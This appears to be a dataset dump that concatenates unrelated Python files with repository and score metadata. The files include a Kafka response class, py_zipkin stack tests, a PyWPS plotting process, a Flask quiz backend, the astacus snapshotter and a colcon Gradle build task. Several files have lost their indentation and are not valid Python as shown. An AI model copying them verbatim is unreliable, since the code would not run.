from ...constants import ApiKey, ErrorCode
from ..base import ResponseData
class PartitionResult:
partition_id: int
error_code: ErrorCode
error_message: Optional[str]
def __init__(self, partition_id: int, error_code: ErrorCode, error_message: Optional[str]):
"""
:param partition_id: The partition id
:type partition_id: int
:param error_code: The result error, or zero if there was no error.
:type error_code: ErrorCode
:param error_message: The result message, or null if there was no error.
:type error_message: Optional[str]
"""
self.partition_id = partition_id
self.error_code = error_code
self.error_message = error_message
class ReplicaElectionResult:
topic: str
partition_result: List[PartitionResult]
def __init__(self, topic: str, partition_result: List[PartitionResult]):
"""
:param topic: The topic name
:type topic: str
:param partition_result: The results for each partition
:type partition_result: List[PartitionResult]
"""
self.topic = topic
self.partition_result = partition_result
class ElectPreferredLeadersResponseData(ResponseData):
throttle_time_ms: int
replica_election_results: List[ReplicaElectionResult]
api_key: ClassVar[ApiKey] = ApiKey.ELECT_PREFERRED_LEADERS
def __init__(self, throttle_time_ms: int, replica_election_results: List[ReplicaElectionResult]):
"""
:param throttle_time_ms: The duration in milliseconds for which the request was throttled due to a quota
violation, or zero if the request did not violate any quota.
:type throttle_time_ms: int
:param replica_election_results: The election results, or an empty array if the requester did not have
permission and the request asks for all partitions.
:type replica_election_results: List[ReplicaElectionResult]
"""
self.throttle_time_ms = throttle_time_ms
self.replica_election_results = replica_election_results
| 2.359375 | 2 |
tests/stack_test.py | arthurlogilab/py_zipkin | 225 | 3494 | import mock
import pytest
import py_zipkin.storage
@pytest.fixture(autouse=True, scope="module")
def create_zipkin_attrs():
# The following tests all expect _thread_local.zipkin_attrs to exist: if it
# doesn't, mock.patch will fail.
py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_returns_none_if_no_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().get()
assert not py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_none_if_no_zipkin_attrs():
with mock.patch.object(py_zipkin.storage.log, "warning", autospec=True) as log:
assert not py_zipkin.storage.Stack([]).get()
assert log.call_count == 1
def test_storage_stack_still_works_if_you_dont_pass_in_storage():
# Let's make sure this still works if we don't pass in a custom storage.
assert not py_zipkin.storage.Stack().get()
def test_get_zipkin_attrs_returns_the_last_of_the_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_get_zipkin_attrs_with_context_returns_the_last_of_the_list():
assert "foo" == py_zipkin.storage.Stack(["bar", "foo"]).get()
def test_pop_zipkin_attrs_does_nothing_if_no_requests():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", []):
assert not py_zipkin.storage.ThreadLocalStack().pop()
def test_pop_zipkin_attrs_with_context_does_nothing_if_no_requests():
assert not py_zipkin.storage.Stack([]).pop()
def test_pop_zipkin_attrs_removes_the_last_zipkin_attrs():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo", "bar"]):
assert "bar" == py_zipkin.storage.ThreadLocalStack().pop()
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
def test_pop_zipkin_attrs_with_context_removes_the_last_zipkin_attrs():
context_stack = py_zipkin.storage.Stack(["foo", "bar"])
assert "bar" == context_stack.pop()
assert "foo" == context_stack.get()
def test_push_zipkin_attrs_adds_new_zipkin_attrs_to_list():
tracer = py_zipkin.storage.get_default_tracer()
with mock.patch.object(tracer._context_stack, "_storage", ["foo"]):
assert "foo" == py_zipkin.storage.ThreadLocalStack().get()
py_zipkin.storage.ThreadLocalStack().push("bar")
assert "bar" == py_zipkin.storage.ThreadLocalStack().get()
def test_push_zipkin_attrs_with_context_adds_new_zipkin_attrs_to_list():
stack = py_zipkin.storage.Stack(["foo"])
assert "foo" == stack.get()
stack.push("bar")
assert "bar" == stack.get()
def test_stack_copy():
stack = py_zipkin.storage.Stack()
stack.push("a")
stack.push("b")
the_copy = stack.copy()
the_copy.push("c")
stack.push("d")
assert ["a", "b", "c"] == the_copy._storage
assert ["a", "b", "d"] == stack._storage
| 2.109375 | 2 |
myapp/processes/plotter.py | cp4cds/cp4cds-wps-template | 0 | 3495 |
from pywps import Process, LiteralInput, ComplexInput, ComplexOutput
from pywps import Format
import logging
LOGGER = logging.getLogger('PYWPS')
import matplotlib
# no X11 server ... must be run first
# https://github.com/matplotlib/matplotlib/issues/3466/
matplotlib.use('Agg')
import matplotlib.pylab as plt
import cartopy.crs as ccrs
from netCDF4 import Dataset
AIR_DS = 'https://www.esrl.noaa.gov/psd/thredds/fileServer/Datasets/ncep.reanalysis.derived/surface/air.mon.ltm.nc'
def simple_plot(resource, variable=None, output=None):
output = output or 'plot.png'
ds = Dataset(resource)
values = ds.variables[variable]
fig = plt.figure(figsize=(20, 10))
ax = plt.axes(projection=ccrs.PlateCarree())
plt.contourf(values[0, :, :])
ax.stock_img()
ax.coastlines()
plt.colorbar()
fig.savefig(output)
plt.close()
return output
class SimplePlot(Process):
def __init__(self):
inputs = [
ComplexInput('dataset', 'Dataset', supported_formats=[Format('application/x-netcdf')],
default=AIR_DS,
abstract='Example: {0}'.format(AIR_DS)),
LiteralInput('variable', 'Variable', data_type='string',
default='air',
abstract='Please enter the variable name to be plotted, example: air'),
]
outputs = [
ComplexOutput('output', 'Simple Plot', supported_formats=[Format('image/png')],
as_reference=True),
]
super(SimplePlot, self).__init__(
self._handler,
identifier='simple_plot',
title='Simple Plot',
abstract='Returns a nice and simple plot.',
version='1.0',
inputs=inputs,
outputs=outputs,
store_supported=True,
status_supported=True
)
def _handler(self, request, response):
variable = request.inputs['variable'][0].data
output = simple_plot(
resource=request.inputs['dataset'][0].file,
variable=variable)
LOGGER.info("produced output: %s", output)
response.outputs['output'].file = output
response.update_status("simple_plot done", 100)
return response
| 2.328125 | 2 |
json_schema_checker/composed/__init__.py | zorgulle/json_schema_checker | 0 | 3496 | <filename>json_schema_checker/composed/__init__.py<gh_stars>0
from .composed import List
from .composed import IntList | 1.234375 | 1 |
backend/social_quiz.py | jmigual/socialQuiz | 0 | 3497 | # -*- coding: utf-8 -*-
import json
import os.path
import random
import re
from flask import Flask, send_from_directory
from flask import request, abort
from flaskrun.flaskrun import flask_run
import datab.social_database as db
app = Flask(__name__)
# Regular expression to only accept certain files
fileChecker = re.compile(r"(.*\.js|.*\.html|.*\.png|.*\.css|.*\.map)$")
numberOfAnswers = 4
random.seed(7)
def root_dir(): # pragma: no cover
return os.path.abspath(os.path.dirname(__file__))
@app.route('/')
def root():
return index("index2.html")
@app.route('/<path:filename>')
def index(filename):
if fileChecker.match(filename):
return send_from_directory(os.path.join(root_dir(), 'static'), filename)
abort(403)
@app.route('/register')
def register():
# To obtain the mail
email = request.args.get('email')
print(email)
if email is None:
return json.dumps({})
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/join_room')
def join_room():
room_id = request.args.get('room_id')
email = request.args.get('email')
user_id = db.register_or_get_email(email)
db.exec_query("REPLACE INTO room_members (room_id, user_id) VALUES (%s,%s)", [room_id, user_id])
return json.dumps({"id": user_id})
@app.route('/answered_room')
def answered_room():
room_id = request.args.get('room_id')
user_id = request.args.get('user_id')
values = db.exec_query("SELECT a.id "
"FROM answer a INNER JOIN question q "
"WHERE a.question_id = q.id AND q.room_id = %s AND a.user_id= %s",
[room_id, user_id])
return json.dumps({"answered": len(values) > 0})
@app.route('/get_user_id')
def get_user_id():
email = request.args.get('email')
id_user = db.register_or_get_email(email)
return json.dumps({"id": id_user})
@app.route('/create_room')
def create_room():
user_id = request.args.get('user_id')
room_id = db.exec_query("INSERT INTO room (creator) VALUES (%s)", [user_id])
return json.dumps({"id": room_id})
@app.route('/get_rooms')
def get_rooms():
user_id = request.args.get('user_id')
values = db.exec_query("SELECT r.id, r.status FROM room r WHERE r.creator=%s", [user_id])
response = []
for val in values:
response.append({"id": val[0], "status": val[1]})
return json.dumps(response)
@app.route('/fill_room', methods=['POST'])
def fill_room():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"})
else:
room_id = json_data["room_id"]
questions = json_data["question"]
for q in questions:
db.exec_query("INSERT INTO question (room_id, question) VALUES (%s, %s)", [room_id, q])
return json.dumps({"info": "Data received"})
@app.route('/open_room')
def open_room():
room_id = request.args.get('room_id')
print(room_id)
db.exec_query("UPDATE room r SET r.status='started' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been opened successfully", "status": "started"})
@app.route('/close_room')
def close_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='closed' WHERE r.id = %s", [room_id])
return json.dumps({"info": "The room has been closed successfully", "status": "closed"})
@app.route('/finish_room')
def finish_room():
room_id = request.args.get('room_id')
db.exec_query("UPDATE room r SET r.status='finished' WHERE r.id = %s", [room_id])
# for
# SELECT id, COUNT(a.id), COUNT(a.id) FROM Room r INNER JOIN
values = db.exec_query("SELECT u.email , COUNT(qq.id) "
"FROM quiz_question qq "
"INNER JOIN users u ON (qq.asked_user_id = u.id) "
"INNER JOIN room_members rm ON (u.id = rm.user_id) "
"WHERE qq.correct_answer_id = qq.answered_id AND rm.room_id = %s "
"GROUP BY u.email "
"ORDER BY COUNT(qq.id) DESC",
[room_id])
ranking = []
for row in values:
ranking.append({"email": row[0], "correct": row[1]})
return json.dumps({"ranking": ranking})
@app.route('/room_status')
def status_room():
room_id = request.args.get('room_id')
# SELECT status FROM Room WHERE id = 1
values = db.exec_query("SELECT status FROM room WHERE id = %s", [room_id])
return json.dumps({
"status": values[0][0]
})
@app.route('/get_room_questions')
def get_room_question():
room_id = request.args.get('room_id')
values = db.exec_query("SELECT id, question FROM question WHERE room_id = %s", [room_id])
response = []
for val in values:
response.append({"id": val[0], "text": val[1]})
return json.dumps({"questions": response})
@app.route('/post_room_answers', methods=['POST'])
def post_room_answers():
json_data = request.get_json()
if json_data is None:
return json.dumps({"error": "no JSON found"}), 404
user_id = json_data["user_id"]
values = []
for a in json_data["answers"]:
values.append((a["id"], user_id, a["text"]))
print(values[len(values) - 1])
db.exec_many_query("INSERT INTO answer (question_id, user_id, answer) VALUES(%s,%s,%s)", values)
return json.dumps({"info": "Data received"})
@app.route('/get_quiz_question')
def get_question():
room_id = int(request.args.get('room_id'))
user_id = int(request.args.get('user_id'))
possible_questions = db.get_non_answered_questions(room_id, user_id)
possible_users_to_ask = db.get_non_answered_people(room_id, user_id)
question_id = []
asked_about_id = []
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
else:
possible_questions = db.get_all_questions(room_id)
if len(possible_questions) > 0:
question_id = random.sample(possible_questions, 1)
if len(possible_users_to_ask) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
else:
possible_users_to_ask = db.get_all_different_people(room_id, user_id)
if len(possible_questions) > 0:
asked_about_id = random.sample(possible_users_to_ask, 1)
if len(question_id) > 0 and 0 < len(asked_about_id):
quiz_question_id = db.insert_quiz_question(user_id, asked_about_id[0], question_id[0])
other_users = db.get_all_different_people(room_id, asked_about_id[0])
random.shuffle(other_users)
answers = []
(answer_id, text_id) = db.get_answer(question_id[0], asked_about_id[0])
db.exec_query("UPDATE quiz_question SET correct_answer_id=%s WHERE id = %s", [answer_id, quiz_question_id])
answers.append((answer_id, text_id))
if min(numberOfAnswers - 1, len(other_users)) > 0:
for i in range(min(numberOfAnswers - 1, len(other_users))):
(answer_id, text_id) = db.get_answer(question_id[0], other_users[i])
answers.append((answer_id, text_id))
        # if this shuffle is commented out, the first answer will be the correct one
random.shuffle(answers)
answer_json = []
for (answer_id, text_id) in answers:
answer_json.append({"id": answer_id, "text": text_id})
print(quiz_question_id)
# SELECT 'question' FROM 'Question' WHERE 'id' = 3
value = db.exec_query("SELECT id "
"FROM quiz_question "
"WHERE asked_user_id = %s AND about_user_id = %s AND question_id = %s",
[user_id, asked_about_id[0], question_id[0]])
quiz_question_id = value[0][0]
value = db.exec_query("SELECT q.question "
"FROM question q "
"WHERE q.id = %s",
[question_id[0]])
question_text = value[0][0]
value = db.exec_query("SELECT u.email "
"FROM users u "
"WHERE u.id=%s",
[asked_about_id[0]])
user_name = value[0][0]
question_text = "What did %s answer to '%s' ?" % (user_name, question_text)
return json.dumps({
"id": quiz_question_id,
"question": question_text,
"answers": answer_json
})
else:
return json.dumps({"error": "Not available questions for this user in this room"})
@app.route('/post_quiz_answer')
def post_answer():
quiz_question_id = request.args.get('quiz_question_id')
quiz_answer_id = request.args.get('quiz_answer_id')
db.exec_query("UPDATE quiz_question SET answered_id = %s WHERE id = %s", [quiz_answer_id, quiz_question_id])
value = db.exec_query("SELECT qq.answered_id, qq.correct_answer_id, qq.question_id "
"FROM quiz_question qq "
"WHERE qq.id = %s", [quiz_question_id])
answered_id = value[0][0]
correct_answer_id = value[0][1]
question_id = value[0][2]
value = db.exec_query("SELECT a.answer FROM answer a WHERE a.id = %s ", [correct_answer_id])
if len(value) > 0:
text = value[0][0]
else:
text = "something when wrong"
if value is None:
return json.dumps({"error": "Internal server error"})
return json.dumps({
"correct": answered_id == correct_answer_id,
"question": question_id,
"correct_answer": {"id": correct_answer_id, "text": text}
})
if __name__ == '__main__':
flask_run(app)
| 2.578125 | 3 |
astacus/node/snapshotter.py | aiven/astacus | 19 | 3498 | """
Copyright (c) 2020 Aiven Ltd
See LICENSE for details
"""
from astacus.common import magic, utils
from astacus.common.ipc import SnapshotFile, SnapshotHash, SnapshotState
from astacus.common.progress import increase_worth_reporting, Progress
from pathlib import Path
from typing import Optional
import base64
import hashlib
import logging
import os
import threading
logger = logging.getLogger(__name__)
_hash = hashlib.blake2s
def hash_hexdigest_readable(f, *, read_buffer=1_000_000):
h = _hash()
while True:
data = f.read(read_buffer)
if not data:
break
h.update(data)
return h.hexdigest()
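# e.g. hash_hexdigest_readable(open("some_file", "rb")) returns the blake2s hex digest
# of the file, computed in 1 MB chunks so large files are never read into memory at once.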
class Snapshotter:
"""Snapshotter keeps track of files on disk, and their hashes.
The hash on disk MAY change, which may require subsequent
    incremental snapshots and/or ignoring the files which have changed.
The output to outside is just root object's hash, as well as list
of other hashes which correspond to files referred to within the
file list contained in root object.
Note that any call to public API MUST be made with
snapshotter.lock held. This is because Snapshotter is process-wide
utility that is shared across operations, possibly used from
multiple threads, and the single-operation-only mode of operation
is not exactly flawless (the 'new operation can be started with
    old running' is an intentional feature, but the new operation should
eventually replace the old). The lock itself might not need to be
built-in to Snapshotter, but having it there enables asserting its
state during public API calls.
"""
def __init__(self, *, src, dst, globs, parallel):
assert globs # model has empty; either plugin or configuration must supply them
self.src = Path(src)
self.dst = Path(dst)
self.globs = globs
self.relative_path_to_snapshotfile = {}
self.hexdigest_to_snapshotfiles = {}
self.parallel = parallel
self.lock = threading.Lock()
def _list_files(self, basepath: Path):
result_files = set()
for glob in self.globs:
for path in basepath.glob(glob):
if not path.is_file() or path.is_symlink():
continue
relpath = path.relative_to(basepath)
for parent in relpath.parents:
if parent.name == magic.ASTACUS_TMPDIR:
break
else:
result_files.add(relpath)
return sorted(result_files)
def _list_dirs_and_files(self, basepath: Path):
files = self._list_files(basepath)
dirs = {p.parent for p in files}
return sorted(dirs), files
def _add_snapshotfile(self, snapshotfile: SnapshotFile):
old_snapshotfile = self.relative_path_to_snapshotfile.get(snapshotfile.relative_path, None)
if old_snapshotfile:
self._remove_snapshotfile(old_snapshotfile)
self.relative_path_to_snapshotfile[snapshotfile.relative_path] = snapshotfile
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles.setdefault(snapshotfile.hexdigest, []).append(snapshotfile)
def _remove_snapshotfile(self, snapshotfile: SnapshotFile):
assert self.relative_path_to_snapshotfile[snapshotfile.relative_path] == snapshotfile
del self.relative_path_to_snapshotfile[snapshotfile.relative_path]
if snapshotfile.hexdigest:
self.hexdigest_to_snapshotfiles[snapshotfile.hexdigest].remove(snapshotfile)
def _snapshotfile_from_path(self, relative_path):
src_path = self.src / relative_path
st = src_path.stat()
return SnapshotFile(relative_path=relative_path, mtime_ns=st.st_mtime_ns, file_size=st.st_size)
def _get_snapshot_hash_list(self, relative_paths):
same = 0
lost = 0
for relative_path in relative_paths:
old_snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
try:
snapshotfile = self._snapshotfile_from_path(relative_path)
except FileNotFoundError:
lost += 1
if increase_worth_reporting(lost):
logger.debug("#%d. lost - %s disappeared before stat, ignoring", lost, self.src / relative_path)
continue
if old_snapshotfile:
snapshotfile.hexdigest = old_snapshotfile.hexdigest
snapshotfile.content_b64 = old_snapshotfile.content_b64
if old_snapshotfile == snapshotfile:
same += 1
if increase_worth_reporting(same):
logger.debug("#%d. same - %r in %s is same", same, old_snapshotfile, relative_path)
continue
yield snapshotfile
def get_snapshot_hashes(self):
assert self.lock.locked()
return [
SnapshotHash(hexdigest=dig, size=sf[0].file_size) for dig, sf in self.hexdigest_to_snapshotfiles.items() if sf
]
def get_snapshot_state(self):
assert self.lock.locked()
return SnapshotState(root_globs=self.globs, files=sorted(self.relative_path_to_snapshotfile.values()))
def _snapshot_create_missing_directories(self, *, src_dirs, dst_dirs):
changes = 0
for i, relative_dir in enumerate(set(src_dirs).difference(dst_dirs), 1):
dst_path = self.dst / relative_dir
dst_path.mkdir(parents=True, exist_ok=True)
if increase_worth_reporting(i):
logger.debug("#%d. new directory: %r", i, relative_dir)
changes += 1
return changes
def _snapshot_remove_extra_files(self, *, src_files, dst_files):
changes = 0
for i, relative_path in enumerate(set(dst_files).difference(src_files), 1):
dst_path = self.dst / relative_path
snapshotfile = self.relative_path_to_snapshotfile.get(relative_path)
if snapshotfile:
self._remove_snapshotfile(snapshotfile)
dst_path.unlink()
if increase_worth_reporting(i):
logger.debug("#%d. extra file: %r", i, relative_path)
changes += 1
return changes
def _snapshot_add_missing_files(self, *, src_files, dst_files):
existing = 0
disappeared = 0
changes = 0
for i, relative_path in enumerate(set(src_files).difference(dst_files), 1):
src_path = self.src / relative_path
dst_path = self.dst / relative_path
try:
os.link(src=src_path, dst=dst_path, follow_symlinks=False)
except FileExistsError:
# This happens only if snapshot is started twice at
# same time. While it is technically speaking upstream
# error, we rather handle it here than leave
# exceptions not handled.
existing += 1
if increase_worth_reporting(existing):
logger.debug("#%d. %s already existed, ignoring", existing, src_path)
continue
except FileNotFoundError:
disappeared += 1
if increase_worth_reporting(disappeared):
logger.debug("#%d. %s disappeared before linking, ignoring", disappeared, src_path)
continue
if increase_worth_reporting(i - disappeared):
logger.debug("#%d. new file: %r", i - disappeared, relative_path)
changes += 1
return changes
def snapshot(self, *, progress: Optional[Progress] = None):
assert self.lock.locked()
if progress is None:
progress = Progress()
src_dirs, src_files = self._list_dirs_and_files(self.src)
progress.start(1)
if self.src == self.dst:
# The src=dst mode should be used if and only if it is
# known that files will not disappear between snapshot and
# upload steps (e.g. Astacus controls the lifecycle of the
# files within). In that case, there is little point in
# making extra symlinks and we can just use the src
# directory contents as-is.
dst_dirs, dst_files = src_dirs, src_files
else:
progress.add_total(3)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
# Create missing directories
changes = self._snapshot_create_missing_directories(src_dirs=src_dirs, dst_dirs=dst_dirs)
progress.add_success()
# Remove extra files
changes += self._snapshot_remove_extra_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# Add missing files
changes += self._snapshot_add_missing_files(src_files=src_files, dst_files=dst_files)
progress.add_success()
# We COULD also remove extra directories, but it is not
# probably really worth it and due to ignored files it
# actually might not even work.
# Then, create/update corresponding snapshotfile objects (old
# ones were already removed)
dst_dirs, dst_files = self._list_dirs_and_files(self.dst)
snapshotfiles = list(self._get_snapshot_hash_list(dst_files))
progress.add_total(len(snapshotfiles))
def _cb(snapshotfile):
# src may or may not be present; dst is present as it is in snapshot
with snapshotfile.open_for_reading(self.dst) as f:
if snapshotfile.file_size <= magic.EMBEDDED_FILE_SIZE:
snapshotfile.content_b64 = base64.b64encode(f.read()).decode()
else:
snapshotfile.hexdigest = hash_hexdigest_readable(f)
return snapshotfile
def _result_cb(*, map_in, map_out):
self._add_snapshotfile(map_out)
progress.add_success()
return True
changes += len(snapshotfiles)
utils.parallel_map_to(iterable=snapshotfiles, fun=_cb, result_callback=_result_cb, n=self.parallel)
# We initially started with 1 extra
progress.add_success()
return changes
| 2.328125 | 2 |
colcon_gradle/task/gradle/build.py | richiware/colcon-gradle | 0 | 3499 | <filename>colcon_gradle/task/gradle/build.py<gh_stars>0
# Copyright 2018 <NAME>
# Licensed under the Apache License, Version 2.0
from distutils import dir_util
import glob
import os
from pathlib import Path
import shutil
from colcon_core.environment import create_environment_scripts
from colcon_core.logging import colcon_logger
from colcon_core.plugin_system import satisfies_version
from colcon_core.shell import create_environment_hook
from colcon_core.shell import get_command_environment
from colcon_core.task import run
from colcon_core.task import TaskExtensionPoint
from colcon_gradle.task.gradle import get_wrapper_executable
from colcon_gradle.task.gradle import GRADLE_EXECUTABLE
from colcon_gradle.task.gradle import has_wrapper_executable
logger = colcon_logger.getChild(__name__)
class GradleBuildTask(TaskExtensionPoint):
"""Build gradle packages."""
def __init__(self): # noqa: D107
super().__init__()
satisfies_version(TaskExtensionPoint.EXTENSION_POINT_VERSION, '^1.0')
def _build_file_tree(self, start_path):
out_dirnames = set()
out_filenames = set()
for dirname, dirnames, filenames in os.walk(start_path):
for subdirname in dirnames:
out_dirnames.add(
os.path.relpath(
os.path.join(dirname, subdirname), start=start_path))
for filename in filenames:
out_filenames.add(
os.path.relpath(
os.path.join(dirname, filename), start=start_path))
return (out_dirnames, out_filenames)
def add_arguments(self, *, parser): # noqa: D102
parser.add_argument(
'--gradle-args',
nargs='*', metavar='*', type=str.lstrip,
help='Pass arguments to Gradle projects. '
'Arguments matching other options must be prefixed by a space,\n'
'e.g. --gradle-args " --help"')
parser.add_argument(
'--gradle-task',
help='Run a specific task instead of the default task')
async def build( # noqa: D102
self, *, additional_hooks=None, skip_hook_creation=False
):
pkg = self.context.pkg
args = self.context.args
logger.info(
"Building Gradle package in '{args.path}'".format_map(locals()))
if additional_hooks is None:
additional_hooks = []
# add jars and classes to CLASSPATH with wildcards
# https://docs.oracle.com/javase/8/docs/technotes/tools/windows/classpath.html#A1100762
additional_hooks += create_environment_hook(
'classpath_jars', Path(args.install_base), pkg.name,
'CLASSPATH', os.path.join('share', pkg.name, 'java', '*'),
mode='prepend')
additional_hooks += create_environment_hook(
'classpath_classes', Path(args.install_base), pkg.name,
'CLASSPATH', os.path.join('share', pkg.name, 'java'),
mode='prepend')
try:
env = await get_command_environment(
'build', args.build_base, self.context.dependencies)
except RuntimeError as e:
logger.error(str(e))
return 1
rc = await self._build(args, env)
if rc and rc.returncode:
return rc.returncode
rc = await self._install(args, env)
if rc and rc.returncode:
return rc.returncode
if not skip_hook_creation:
create_environment_scripts(
pkg, args, additional_hooks=additional_hooks)
async def _build(self, args, env):
self.progress('build')
# remove anything on the destination tree but not in the source tree
src_package_src_dir = os.path.join(args.path, 'src')
dst_package_src_dir = os.path.join(args.build_base, 'src')
src_dirnames, src_filenames = self._build_file_tree(
src_package_src_dir)
dst_dirnames, dst_filenames = self._build_file_tree(
dst_package_src_dir)
prune_dirnames = dst_dirnames - src_dirnames
prune_filenames = dst_filenames - src_filenames
for prune_filename in prune_filenames:
os.remove(os.path.join(dst_package_src_dir, prune_filename))
for prune_dirname in prune_dirnames:
if os.path.exists(prune_dirname):
shutil.rmtree(os.path.join(dst_package_src_dir, prune_dirname))
# copy files from the source directory to the build one to avoid
# polluting the latter during the build process
dir_util.copy_tree(args.path, args.build_base, update=1)
# Gradle Executable
if has_wrapper_executable(args):
cmd = [str(get_wrapper_executable(args).absolute())]
elif GRADLE_EXECUTABLE is not None:
cmd = [GRADLE_EXECUTABLE]
else:
raise RuntimeError(
"Could not find 'gradle' or 'wrapper' executable")
# Gradle Task (by default 'assemble')
if args.gradle_task:
cmd += [args.gradle_task]
else:
cmd += ['assemble']
# Gradle Arguments
cmd += (args.gradle_args or [])
cmd += ['--stacktrace']
# Add install_base to environment in GRADLE_INSTALL_PREFIX
env['GRADLE_INSTALL_PREFIX'] = args.install_base
# invoke build step
return await run(
self.context, cmd, cwd=args.build_base, env=env)
async def _install(self, args, env):
self.progress('install')
pkg = self.context.pkg
# remove anything on the destination tree but not in the build tree
bld_package_jar_dir = os.path.join(args.build_base, 'build', 'libs')
dst_package_jar_dir = os.path.join(
args.install_base, 'share', pkg.name, 'java')
os.makedirs(dst_package_jar_dir, exist_ok=True)
bld_dirnames, bld_filenames = self._build_file_tree(
bld_package_jar_dir)
dst_dirnames, dst_filenames = self._build_file_tree(
dst_package_jar_dir)
prune_dirnames = dst_dirnames - bld_dirnames
prune_filenames = dst_filenames - bld_filenames
for prune_filename in prune_filenames:
os.remove(os.path.join(dst_package_jar_dir, prune_filename))
for prune_dirname in prune_dirnames:
if os.path.exists(prune_dirname):
shutil.rmtree(
os.path.join(dst_package_jar_dir, prune_dirname))
for jar in glob.glob(os.path.join(bld_package_jar_dir, '*.jar')):
jar_filename = os.path.basename(jar)
shutil.copy2(jar, os.path.join(dst_package_jar_dir, jar_filename))
| 1.976563 | 2 |